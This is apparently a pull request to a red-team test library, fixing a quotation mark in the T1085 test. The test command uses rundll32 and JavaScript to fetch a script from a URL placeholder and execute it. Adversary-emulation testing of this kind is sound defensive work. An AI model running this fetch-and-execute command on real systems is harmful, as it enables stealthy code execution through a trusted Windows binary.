### PR TITLE
T1085 deleting wrong "extra" quotation mark

### DIFF
--- a/atomics/T1085/T1085.yaml
+++ b/atomics/T1085/T1085.yaml
@@ -16,7 +16,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: false
     command: |
-      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
 
 - name: Rundll32 execute VBscript command
   description: |


### PR DESCRIPTION
**Details:**
There are 5 quote symbols in a  single command. Executing the given command generates a JScript error "Unterminated string constant"
Deleting the extra quote causes the command to correctly open notepad.exe


